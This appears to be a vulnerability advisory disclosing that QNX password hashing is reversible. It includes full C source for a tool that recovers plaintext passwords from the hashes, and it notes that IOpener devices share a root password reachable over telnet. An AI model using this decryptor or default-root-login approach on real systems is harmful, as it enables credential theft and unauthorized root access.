COMMAND

    qnx

SYSTEMS AFFECTED

    QNX

PROBLEM

    Sean Skasun found  following.  The  crypt function for  qnx turned
    out to  a bit  mixer, not  a hash  function. It's  now possible to
    extract  plaintext  from  the  hashes.   On  a  related  note, all
    IOpeners (running  qnx) use  the same  root password.   Telnetd is
    running,  and  allows  remote  login  as  root.   This  is  a huge
    security hole, as  you can search  uunet for Iopeners,  and telnet
    in as root.

    Source for the uncryptor is below:

    static ascii2bin(short x)
    {
      if (x>='0' && x<'A')
        return x-'0';
      if (x>='A' && x<'a')
        return (x-'A')+9;
      return (x-'a')+26+9;
    }
    char bits[77];
    
    char *quncrypt(char *pw)
    {
      static char newpw[14];
      int i;
      int j,rot;
      int bit,ofs;
      char salt[2];
      int temp;
    
      salt[0]=*pw++;
      salt[1]=*pw++;
      for (i=0;i<72;i++)
        bits[i]=0;
      for (i=0;i<12;i++)
        newpw[i]=ascii2bin(pw[i]);
      newpw[13]=0;
      rot=(salt[1]*4-salt[0])%128;  /* here's all the salt
    does.                                  A rotation */
      for (i=0;i<12;i++)
      {
        for (j=0;j<6;j++)
        {
          bit=newpw[i]&(1<<j);  /* move password into bit array
    */
          bits[i*6+j]=bit?1:0;
        }
      }
      while (rot--)  /* do the big rotate */
      {
        bits[66]=bits[0];
        for (i=0;i<=65;i++)
          bits[i]=bits[i+1];
      }
    
      for (i=0;i<8;i++)
      {
        newpw[i]=0;
        for (j=0;j<7;j++)
        {
          bit=bits[i+j*8];
          newpw[i]|=(bit<<j);  /* and compile the bit array back
    */
        }
      }
      newpw[8]=0;
      return newpw;
    }

SOLUTION

    Nothing yet.